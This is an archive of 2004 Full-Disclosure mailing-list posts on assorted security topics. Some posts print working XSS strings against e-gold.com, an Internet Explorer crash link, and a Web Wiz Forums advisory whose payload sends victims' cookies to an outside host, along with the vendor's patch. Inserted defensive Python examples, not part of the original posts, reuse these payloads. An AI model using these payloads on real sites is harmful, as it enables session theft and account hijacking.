Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- application/octet-stream attachment: Document.com
Re: [Full-Disclosure] linux kernel local crash seen on slashdot
From: Dave Monnier, IT Security Office, Indiana University (dmonnier@iu.edu)
Date: Tue Jun 15 2004 - 08:23:58 CDT
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Stefan SF wrote:
> Not really,
>
> but you could activate PaX which prevents the exploit!
>
> ....hth...
>
> Stefan
The vulnerability mentioned in the topic affects PaX enabled kernels as
well.
Cheers,
- -Dave
- --
| Dave Monnier - dmonnier@iu.edu - http://php.indiana.edu/~dmonnier/ |
| Lead Security Engineer, Information Technology Security Office |
| Office of the VP for Information Technology, Indiana University |
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
iD8DBQFAzvhuBIf6jlONJjIRAlzTAKCa0Vv6pPTkKZ2rDJg3CngXblfqUgCgwZG9
WshZ1tnkYP+Fz0yJhf2DwVw=
=3/bZ
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Antivirus/Trojan/Spyware scanners DoS!
From: Cory Donnelly (cory@onryou.com)
Date: Tue Jun 15 2004 - 07:25:59 CDT
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Aditya, ALD [Aditya Lalit Deshmukh] wrote:
> First of all this might be a social engg. attempt to find your
> antivirus versions and if the allow passing of malicious code thr.. so
> please santise your data before sending to the list
Who, Bipin? Are you kidding? He's as harmless as a puppy wrapped in
bubble-wrap.
C
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (MingW32)
iD8DBQFAzurXokBdAgPGOhURAsP0AKDwVqDSbGjUD3AnMdiGSLX5D4mOcgCg+LQ5
QVIc7ScXhq79iLqcYwPC1tI=
=OAx6
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Akamai
From: Niek Baakman (niekbaakman@home.nl)
Date: Tue Jun 15 2004 - 08:58:27 CDT
Hi list,
Akamai disappeared from the internet about an hour ago.
(All their DNS servers are dead, hence many companies that
use Akamai are unreachable: microsoft.com, liveupdate.symantec.com,
Apple, some search engines.)
Does anyone know if it is security-related (DDoS, something else)?
Regards,
Niek
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Yahoo upgraded all accounts to 100MB
From: Syed Imran Ali (manipeto@yahoo.co.uk)
Date: Tue Jun 15 2004 - 08:57:30 CDT
Hiya,
It is nice to see my inbox today having 100MB of storage space, 84%
remaining. Yahoo now allows up to 10MB attachments too.... I am not sure
whether .co.uk is still allowing POP with 100MB, as it was with 6MB.
Regards,
S. Imran Ali
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] antivirus and spyware scanning
From: Lee Leahu (lee@ricis.com)
Date: Tue Jun 15 2004 - 09:45:33 CDT
Hello Everyone,
I recently came across a Linux based live-CD designed for virus scanning, disaster recovery, network analysis, etc.
http://www.inside-security.de/insert_en.html
I think it is very useful to scan a Windows machine for viruses while having that machine booted to Linux. This pretty much ensures that you will find all the viruses on that system.
Does anyone know of a spyware scanner that can also work from within Linux? I dislike the idea of having to boot to Windows just to scan the box for spyware. One could argue that the hard drive could be put into another machine and scanned there, but what if you're in an environment where that is just not possible (making housecalls, no unused machine, etc.)?
Also, if you know of a better solution than this, I am always interested.
Thanks
--
Lee Leahu                         RICIS, Inc.
Internet Technology Specialist    866-RICIS-77 Toll Free Voice (US)
lee@ricis.com                     708-444-2690 Voice (International)
http://www.ricis.com/             866-99-RICIS Toll Free Fax (US)
                                  708-444-2697 Fax (International)
RICIS, Inc. is a member of the Public Safety Alliance Group
This email and any attachments that are included in it have been scanned
for malicious or inappropriate content and are believed to be safe.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] MAGIC XSS INTO THE DNS: coelacanth
From: http-equiv@excite.com
Date: Tue Jun 15 2004 - 10:19:21 CDT
Tuesday, June 12, 2004
The following, courtesy of 'bitlance winter', adds an entirely new
dimension to the matter and also suggests some additional
peculiarities at play:
<a href='http://"><plaintext>.e-gold.com'>foo</a>
<a href='http://"><script>alert()<%2Fscript>.e-gold.com'>foo</a>
These will inject arbitrary HTML and script into the site in the
context of the 'intranet zone', which means one no longer needs
to go out and set up a site with the DNS issue; all one needs to
do is locate a functioning site, include their code into a
suitable URL, and either direct the target via that or place an
iframe elsewhere pointing to it.
Still unclear how or why this can be interpreted into the site
or through the browser.
credit: 'bitlance winter'
End Call
--
http://www.malware.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
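The hrefs quoted above carry quote and angle-bracket characters inside what should be the host name of the URL. As an added example (not part of the post, and not the browser code the post is about), here is the kind of strict host-name check a link sanitiser or URL filter can apply before such a link reaches a client: the authority section is split off before any percent-decoding, decoded, and then validated label by label against the RFC 1123 host-name rules. The two hrefs from the post are embedded as constructed test data; `extract_host`, `is_valid_hostname` and `classify_href` are names chosen for this example.

```python
import re
from urllib.parse import unquote

# Added example, not from the post: a strict host-name check of the kind a
# URL filter or link sanitiser can apply before a browser sees the link.
# The hrefs from the post are embedded below as constructed test data.

# One RFC 1123 label: 1-63 letters/digits/hyphens, no leading/trailing hyphen.
LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def extract_host(href):
    """Host part of an http(s) URL, percent-decoded and lowercased.
    Returns None when the URL has no '//' authority section at all."""
    m = re.match(r"^(?:https?:)?//([^/?#]*)", href, re.IGNORECASE)
    if not m:
        return None
    authority = unquote(m.group(1))           # split first, then decode
    authority = authority.rsplit("@", 1)[-1]  # drop any userinfo
    host = authority.split(":", 1)[0]         # drop any port
    return host.lower()


def is_valid_hostname(host):
    """RFC 1123 host name: at most 253 chars, dot-separated valid labels."""
    if not host or len(host) > 253:
        return False
    labels = host.rstrip(".").split(".")
    return all(LABEL_RE.match(label) for label in labels)


def classify_href(href):
    """'ok' when the host is well-formed, 'reject' otherwise."""
    host = extract_host(href)
    return "ok" if host is not None and is_valid_hostname(host) else "reject"


# Constructed: the two hrefs quoted in the post, plus a well-formed control.
SAMPLE_HREFS = [
    'http://"><plaintext>.e-gold.com',
    'http://"><script>alert()<%2Fscript>.e-gold.com',
    "http://www.e-gold.com/",
]

if __name__ == "__main__":
    for href in SAMPLE_HREFS:
        print(f"{classify_href(href):6}  host={extract_host(href)!r}  {href}")
```

The order matters: the authority is cut at the first `/`, `?` or `#` before percent-decoding, so an encoded `%2F` cannot move the boundary, and the decoded value is then checked character by character rather than pattern-matched for known bad strings. A browser that tolerates such a host is exactly what the post is puzzling over; a filter that rejects it is the simple end of the fix.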
Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB
From: William Warren (hescominsoon@emmanuelcomputerconsulting.com)
Date: Tue Jun 15 2004 - 10:25:00 CDT
hrmm my yahoo account still shows 4.0 megs..do you have a paid account?
Syed Imran Ali wrote:
> Hiya,
>
> It is nice to see my inbox today, having 100MB or storage space, 84%
> remaining. Yahoo now allows up to 10MB attachment too.... I am not sure
> about .co.uk is still allowing POP or not with 100MB, as it was with 6MB.
>
> Regards,
>
> S. Imran Ali
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
--
My "Foundation" verse:
Isa 54:17 No weapon that is formed against thee shall prosper; and
every tongue that shall rise against thee in judgment thou shalt
condemn. This is the heritage of the servants of the LORD, and their
righteousness is of me, saith the LORD.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Dull-Disclosure
From: Eric Paynter (eric@arcticbears.com)
Date: Tue Jun 15 2004 - 11:01:02 CDT
On Mon, June 14, 2004 3:30 pm, Curt Purdy said:
> You think infosec.volubis.com was dissing us?
[...]
> Quote:
> has been posted onto a dull disclosure mailing list.
f and d are right next to each other on a QWERTY keyboard. Perhaps it was
just a typo. :-?
-Eric
--
arctic bears - affordable email and name services
yourdomain.com
http://www.arcticbears.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] antivirus and spyware scanning
From: Dave King (davefd@davewking.com)
Date: Tue Jun 15 2004 - 10:41:23 CDT
I've looked at several bootable Linux CDs and haven't found one to
remove Windows spyware. BartPE ( http://www.nu2.nu/pebuilder/ ) is a
Windows XP/2003 based bootable CD that will allow you to run Ad-Aware.
The one limitation seems to be that it won't scan the registry on the
Windows installation on the hard drive. If you haven't checked it out,
BartPE is really a cool project that basically lets you master your own
CD to your own liking. It has a pretty large community backing and users
who make all sorts of add-ins. You can, for example, add virus scanning
to your BartPE CD as well.
You may also be able to get Ad-Aware, or some similar program, to run
using WINE on a Knoppix based distro like Auditor Security Collection or
Knoppix-STD.
Good Luck,
Dave King
http://www.thesecure.net
Lee Leahu wrote:
>Hello Everyone,
>
>I recently came across a linux based live-cd designed for virus scanning, disaster recover, network analysis, etc.
>
>http://www.inside-security.de/insert_en.html
>
>I think it is very useful to scan a windows machine from viruses while having that machine booted to linux. This pretty much ensures that you will find all the virii on that system.
>
>Does anyone know of a spyware scanner that can also work from within Linux? I dis-like the idea of having to boot to windows just to scan the box for spyware. One could argue that the harddrive could be put into another machine and scanned there, but what if your in an environment where that is just not possible (making housecalls, no unused machine, etc)?
>
>Also, if you know of a better solution that this, I am always interested.
>
>Thanks
>
>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] US Bank scam
From: David Lederman (delphi4pro@yahoo.com)
Date: Tue Jun 15 2004 - 11:29:50 CDT
This is the best phishing scam I've seen yet:
http://www.bis1bp.com/a12/index.html
I have Windows Server 2003 fully patched and this works. The program fakes an address bar so this
would pass through most people's safety check, after all the address bar clearly has the correct
address.
There are bugs in the code, for example, all your Internet Explorer windows will now have this
address, but again, most people would only have one window open.
__________________________________
Do you Yahoo!?
Yahoo! Mail is new and improved - Check it out!
http://promotions.yahoo.com/new_mail
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB
From: Ron DuFresne (dufresne@winternet.com)
Date: Tue Jun 15 2004 - 11:42:10 CDT
The real question, fellows, is: what does any of this have to do
with security, and who cares how much storage space your particular ISP or
e-mail provider supplies?
Thanks,
Ron DuFresne
On Tue, 15 Jun 2004, William Warren wrote:
> hrmm my yahoo account still shows 4.0 megs..do you have a paid account?
>
>
> Syed Imran Ali wrote:
>
> > Hiya,
> >
> > It is nice to see my inbox today, having 100MB or storage space, 84%
> > remaining. Yahoo now allows up to 10MB attachment too.... I am not sure
> > about .co.uk is still allowing POP or not with 100MB, as it was with 6MB.
> >
> > Regards,
> >
> > S. Imran Ali
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
>
> --
> My "Foundation" verse:
> Isa 54:17 No weapon that is formed against thee shall prosper; and
> every tongue that shall rise against thee in judgment thou shalt
> condemn. This is the heritage of the servants of the LORD, and their
> righteousness is of me, saith the LORD.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1707 - 14 msgs (This message is automatically generated by Groupwise. Apologies for not being able to attend to your)
From: Chin Cheng Baey (Baey@dbs.com)
Date: Tue Jun 15 2004 - 11:26:07 CDT
This message is automatically generated by Groupwise. Apologies for not being able to attend to your email. I'm away and will be back on 17 June. During this period, I will not have access to email.
If the matter is urgent, please contact the following:
Kim Chwee 6878-2640
Joke Fong 6878-2629.
Have a great day.
CONFIDENTIAL NOTE: The information contained in this email is intended only
for the use of the individual or entity named above and may contain
information that is privileged, confidential and exempt from disclosure
under applicable law. If the reader of this message is not the intended
recipient, you are hereby notified that any dissemination, distribution or
copying of this communication is strictly prohibited. If you have received
this message in error, please immediately notify the sender and delete the
mail. Thank you.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Internet Explorer Remote Null Pointer Crash(mshtml.dll)
From: Thor Larholm (thor@pivx.com)
Date: Tue Jun 15 2004 - 12:02:28 CDT
Manually right-clicking and selecting "Save target as" invokes the
download functionality. This can also be automatically triggered by
redirecting with a META tag to a server script that sets Content-Type
and Content-Disposition headers to an unknown MIME-type which causes the
"Open/Save As" dialog box to be triggered during which time IE
automatically tries to initiate the download and create the appropriate
files in the TIF (Temporary Internet Files), just like the "Save target
as" functionality does.
IE automatically initiates the download of any file with an unknown
MIME-type and starts storing this file in the TIF before the user has
selected whether to Open, Save or Cancel the download. If the user
cancels, the file is deleted. This has already been used to plant
arbitrary files in predictable locations and leads to a race condition
where you can cross the security zone boundaries using other
vulnerabilities in the timeframe between when the download is forcefully
initiated and when the user cancels the download.
Regards
Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
thor@pivx.com
Stock symbol: (PIVX)
Phone: +1 (949) 231-8496
PGP: 0x5A276569
6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569
PivX defines a new genre in Desktop Security: Proactive Threat
Mitigation.
<http://www.pivx.com/qwikfix>
-----Original Message-----
From: Berend-Jan Wever [mailto:SkyLined@edup.tudelft.nl]
Sent: Monday, June 14, 2004 6:34 PM
To: full-disclosure@lists.netsys.com; vulnwatch@vulnwatch.org
Subject: Re: [Full-Disclosure] Internet Explorer Remote Null Pointer Crash(mshtml.dll)
Doesn't look like a null pointer to me, especially since it crashes
while reading 800c0005... I think it's a format string vulnerability,
causing ntdll.RtlFormatMessage to call ntdll._snwprintf with your href.
Might be exploitable, I'll have a look...
Cheers,
SkyLined
----- Original Message -----
From: "Rafel Ivgi, The-Insider" <theinsider@012.net.il>
To: "vulnwatch" <vulnwatch@vulnwatch.org>
Sent: Monday, June 14, 2004 23:20
Subject: [Full-Disclosure] Internet Explorer Remote Null Pointer Crash(mshtml.dll)
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~
>
> Application: Internet Explorer
> Vendors: http://www.microsoft.com
> Versions: 6.0.2800.1106.xpclnt_qfe.021108-2107
> Patched With: SP1;Q832894;Q330994;Q837009;Q831167;
> ModName: mshtml.dll
> ModVer: 6.0.2734.1600
> Platforms: Windows
> Bug: Remote/Local Null Pointer Crash
> Exploitation: Remote with browser
> Date: 14 Jun 2004
> Author: Rafel Ivgi, The-Insider
> e-mail: the_insider@mail.com
> web: http://theinsider.deep-ice.com
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~
>
> 1) Introduction
> 2) Bugs
> 3) The Code
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~
>
> ===============
> 1) Introduction
> ===============
>
> Internet Explorer is currently the most common internet browser in the
> world. It comes by default with every windows operating system.
> Therefore any vulnerability
> concerning it is an highly important issue.
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~
>
> ======
> 2) Bug
> ======
>
> Upon clicking "Save As" on a link with double colon --> "::" and
> a left curly bracket --> "{"
> then
> Internet Explorer Will Crash.
>
> AppName: iexplore.exe AppVer: 6.0.2600.0 ModName: ntdll.dll
> ModVer: 5.1.2600.114 Offset: 00056074
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~
>
> ===========
> 3) The Code
> ===========
>
> Paste into an htm/html file:
> <center><a href=::%7b>Right Click aOn Me And Click "Save Target
> As"</a>
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> ~
>
> ---
> Rafel Ivgi, The-Insider
> http://theinsider.deep-ice.com
>
> "Scripts and Codes will make me D.O.S , but they will never HACK me."
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] antivirus and spyware scanning
From: Harlan Carvey (keydet89@yahoo.com)
Date: Tue Jun 15 2004 - 11:43:08 CDT
> I think it is very useful to scan a windows machine
> from viruses while having that machine booted to
> linux. This pretty much ensures that you will find
> all the virii on that system.
Not necessarily. You'll have to update the virus
signatures on your CD distribution prior to scanning,
and that doesn't guarantee complete coverage, either.
> Does anyone know of a spyware scanner that can also
> work from within Linux? I dis-like the idea of
> having to boot to windows just to scan the box for
> spyware. One could argue that the harddrive could
> be put into another machine and scanned there, but
> what if your in an environment where that is just
> not possible (making housecalls, no unused machine,
> etc)?
>
> Also, if you know of a better solution that this, I
> am always interested.
Better solution than what? I'm not really clear on
what you're trying to do...you seem to have Windows
machines that you're interested in scanning for
viruses and spyware...why not simply use Windows apps?
That way, you wouldn't have to boot to another os, or
remove the hard drive at all...
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB
From: Joseph Peterson (joseph@imagescape.com)
Date: Tue Jun 15 2004 - 11:35:29 CDT
Perhaps it is for users who have been with Yahoo for a really long time? I
just checked and mine has been upgraded to 100Mb.
Actually, I wasn't too worried about it because for several months now
their quota on my account has been broken! It always said 92% of capacity
even when I knew I had well over the allotted quota.
-joe
On Tue, 15 Jun 2004, William Warren wrote:
> hrmm my yahoo account still shows 4.0 megs..do you have a paid account?
>
>
> Syed Imran Ali wrote:
>
>> Hiya,
>>
>> It is nice to see my inbox today, having 100MB or storage space, 84%
>> remaining. Yahoo now allows up to 10MB attachment too.... I am not sure
>> about .co.uk is still allowing POP or not with 100MB, as it was with 6MB.
>>
>> Regards,
>>
>> S. Imran Ali
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.netsys.com/full-disclosure-charter.html
>>
>
> --
> My "Foundation" verse:
> Isa 54:17 No weapon that is formed against thee shall prosper; and every
> tongue that shall rise against thee in judgment thou shalt condemn. This is
> the heritage of the servants of the LORD, and their righteousness is of me,
> saith the LORD.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Web Wiz Forums Registration Rules XSS Vulnerability
From: Ferruh Mavituna (ferruh@mavituna.com)
Date: Tue Jun 15 2004 - 12:25:37 CDT
------------------------------------------------------
WEB WIZ FORUMS REGISTRATION RULES XSS VULNERABILITY
------------------------------------------------------
Online URL : http://ferruh.mavituna.com/article/?528
An XSS / Cross Site Scripting attack allows an attacker to hijack other
users' or administrators' accounts.
------------------------------------------------------
ABOUT WEB WIZ FORUMS;
------------------------------------------------------
Web Wiz Forums, the free award winning ASP bulletin board system software,
can add value to almost any web site.
Whether you are building a small interactive community with 10 people or
over 100,000 strong customer support forum, this fast, scalable, bulletin
board engine can manage your community
URL & Demo & Source Code Download ;
http://www.webwizguide.info/web_wiz_forums/
------------------------------------------------------
VULNERABLE;
------------------------------------------------------
Web Wiz Forums Version 7.8 [possibly lower versions]
------------------------------------------------------
NOT VULNERABLE;
------------------------------------------------------
Web Wiz Forums Version 7.9
------------------------------------------------------
PROBLEM;
------------------------------------------------------
- Page
registration_rules.asp (Parameter : FID)
- Test;
registration_rules.asp?FID=%22%3E%3Cscript%3Ealert%28%27Vulnerable%2520%21%27%29%3C%2Fscript%3E
- Possible Exploit Pattern;
- This sample sends cookie to victim URL [in sample http://ferruh.mavituna.com/xss/]
registration_rules.asp?FID=%22%3E%3Cimg+width%3D0+height%3D0+src%3D%22javascript%3Adocument%2Eimages%5B0%5D%2Esrc%3D%27http%3A%2F%2Fferruh%2Emavituna%2Ecom%2Fxss%2F%3F%27%2Bdocument%2Ecookie%22%3E
------------------------------------------------------
HOW TO PATCH [provided by vendor];
------------------------------------------------------
Download http://www.zap2.me.uk/7.7a_and_7.8_to_7.9_patch_files.zip
Version 7.9 has been released to deal with this issue.
Change line 65 of the file registration_rules.asp that reads:-
intForumID = Request.QueryString("FID")
To the following:-
If isNumeric(Request.QueryString("FID")) Then
    intForumID = CInt(Request.QueryString("FID"))
Else
    intForumID = 0
End If
-----------------------------------------------------
HISTORY;
------------------------------------------------------
Discovered : 14.06.2004
Vendor Informed : 15.06.2004
Published : 15.06.2004
------------------------------------------------------
Vendor Status;
------------------------------------------------------
Quickly answered & fixed.
Ferruh Mavituna
Web Application Security Specialist
http://ferruh.mavituna.com
PGPKey : http://ferruh.mavituna.com/PGPKey.asc
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
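As an added example that is not Web Wiz Forums code, the following Python models the FID handling from the advisory on both sides of the fix and adds a log check for requests that carry a non-integer FID. The reflection point (a hidden form field inside a double-quoted attribute) is an assumption chosen to match the advisory's test string, which starts with `%22%3E` (`">`) to break out of a quoted attribute; the access-log lines are constructed, and the function names are mine rather than the product's.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Added example (not Web Wiz Forums code): the FID handling from the
# advisory modelled in Python. Assumption: FID is reflected inside a
# double-quoted attribute, which is what the advisory's test string
# (starting with %22%3E, i.e. "> ) is shaped to break out of.

# The advisory's test string, URL-encoded as published (constructed query).
TEST_QUERY = ("FID=%22%3E%3Cscript%3Ealert%28%27Vulnerable%2520%21%27"
              "%29%3C%2Fscript%3E")


def query_param(query, name):
    """First value of `name` in a query string, percent-decoded, or ''."""
    return parse_qs(query).get(name, [""])[0]


def forum_id_unchecked(query):
    """Behaviour of the original line: the raw string is used as-is."""
    return query_param(query, "FID")


def forum_id_checked(query):
    """Behaviour of the vendor fix: numeric -> integer, otherwise 0.
    A digits-only match is used here; VBScript's IsNumeric is looser
    (signs, decimals, exponents), but the patch's intent is a plain
    positive integer identifier."""
    raw = query_param(query, "FID")
    return int(raw) if re.fullmatch(r"\d+", raw) else 0


def render_rules_form(fid, escape_output):
    """Hypothetical reflection point: FID echoed into a hidden field."""
    value = str(fid)
    if escape_output:
        value = html.escape(value, quote=True)
    return ('<form action="registration_rules.asp">'
            f'<input type="hidden" name="FID" value="{value}"></form>')


def vulnerable_page(query):
    return render_rules_form(forum_id_unchecked(query), escape_output=False)


def patched_page(query):
    return render_rules_form(forum_id_checked(query), escape_output=False)


def hardened_page(query):
    # Defence in depth: validate the input AND encode on output, so a
    # later change that reflects a string-typed parameter stays harmless.
    return render_rules_form(forum_id_checked(query), escape_output=True)


# Common-log-format request line: client, then the request target.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def flag_fid_probes(log_lines):
    """(client, decoded FID) for requests to registration_rules.asp whose
    FID is not a plain integer; a detection over constructed log lines."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("registration_rules.asp"):
            continue
        fid = query_param(parts.query, "FID")
        if fid and not re.fullmatch(r"\d+", fid):
            hits.append((client, fid))
    return hits


# Constructed sample access-log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jun/2004:12:25:37 -0500] "GET /forum/registration_rules.asp?FID=12 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [15/Jun/2004:12:26:02 -0500] "GET /forum/registration_rules.asp?FID=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 5210',
    '192.0.2.10 - - [15/Jun/2004:12:26:40 -0500] "GET /forum/default.asp HTTP/1.1" 200 8000',
]

if __name__ == "__main__":
    print(vulnerable_page(TEST_QUERY))
    print(patched_page(TEST_QUERY))
    print(hardened_page(TEST_QUERY))
    print(flag_fid_probes(SAMPLE_LOG))
```

The digits-only match is stricter than VBScript's `IsNumeric`, which also accepts signs, decimals and exponent notation before `CInt` converts them; for an identifier that is only ever a positive integer, the stricter check is closer to the patch's intent. Output encoding (`hardened_page`) is kept alongside the validation so that a later change that reflects a string parameter does not reopen the hole, and the same digits-only rule doubles as the log-side indicator of who probed the parameter.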
RE: [Full-Disclosure] Akamai
From: Chris Carlson (chris@compucounts.com)
Date: Tue Jun 15 2004 - 12:46:07 CDT
I've just been told that it was a DoS. No details.
> -----Original Message-----
> From: full-disclosure-admin@lists.netsys.com
> [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of
> Niek Baakman
> Sent: Tuesday, June 15, 2004 09:58
> To: full-disclosure@lists.netsys.com
> Subject: [Full-Disclosure] Akamai
>
> Hi list,
>
> akamai disappeared from the internet about an hour ago.
> (all their dns servers are dead, hence many companies that
> use akamai are unreachable: microsoft.com/liveupdate.symantec.com
> apple/some search engines)
>
> Does anyone know if it is security-related (ddos, something else).
>
> Regards,
>
> Niek
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] US Bank scam
From: Eric LeBlanc (inouk@igt.net)
Date: Tue Jun 15 2004 - 12:58:39 CDT
On Tue, 15 Jun 2004, David Lederman wrote:
> This is the best phishing scam I've seen yet:
> http://www.bis1bp.com/a12/index.html
>
> I have Windows Server 2003 fully patched and this works. The program fakes an address bar so this
> would pass through most people's safety check, after all the address bar clearly has the correct
> address.
>
> There are bugs in the code, for example, all your Internet Explorer windows will now have this
> address, but again for most people would only have one window open.
>
If you have google's toolbar or something similar, it will overwrite this
toolbar and not the address bar.
But, I must admit that this thing is ingenious !
E.
--
Eric LeBlanc
inouk@igt.net
--------------------------------------------------
UNIX is user friendly.
It's just selective about who its friends are.
==================================================
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] antivirus and spyware scanning
From: Kevin Ponds (kponds@gmail.com)
Date: Tue Jun 15 2004 - 13:08:17 CDT
Logically speaking, all of a virus's kinetic countermeasures to
detection can be negated by scanning for the virus whilst the drive is
not mounted.
I think the original poster wanted to take more of a forensic approach
to virus removal; in this way the antivirus software cannot be
hijacked itself.
A good implementation would either download the definitions from the
internet right after the CD boots (this could be a problem because of
oddball NICs and Linux drivers), or alternatively from a
floppy/USB key.
The only problems that I see with it are that "at rest" detection
methodology does not work for certain viral stealth maneuvers, such as
polymorphic engines and (in the near future) cryptovirology*.
Run-time analysis is needed for viruses that obfuscate their stored
code.
*However, we have to get our users to stop downloading attachments and
to start patching before the virus writers have any incentive to be
innovative and use things like polymorphic engines and cryptovirology.
ponds
On Tue, 15 Jun 2004 09:43:08 -0700 (PDT), Harlan Carvey
<keydet89@yahoo.com> wrote:
>
>
> > I think it is very useful to scan a windows machine
> > from viruses while having that machine booted to
> > linux. This pretty much ensures that you will find
> > all the virii on that system.
>
> Not necessarily. You'll have to update the virus
> signatures on your CD distribution prior to scanning,
> and that doesn't guarantee complete coverage, either.
>
>
> > Does anyone know of a spyware scanner that can also
> > work from within Linux? I dis-like the idea of
> > having to boot to windows just to scan the box for
> > spyware. One could argue that the harddrive could
> > be put into another machine and scanned there, but
> > what if your in an environment where that is just
> > not possible (making housecalls, no unused machine,
> > etc)?
> >
> > Also, if you know of a better solution that this, I
> > am always interested.
>
> Better solution than what? I'm not really clear on
> what you're trying to do...you seem to have Windows
> machines that you're interested in scanning for
> viruses and spyware...why not simply use Windows apps?
> That way, you wouldn't have to boot to another os, or
> remove the hard drive at all...
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [ GLSA 200406-10 ] Gallery: Privilege escalation vulnerability
From: Thierry Carrez (koon@gentoo.org)
Date: Tue Jun 15 2004 - 14:14:20 CDT
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200406-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
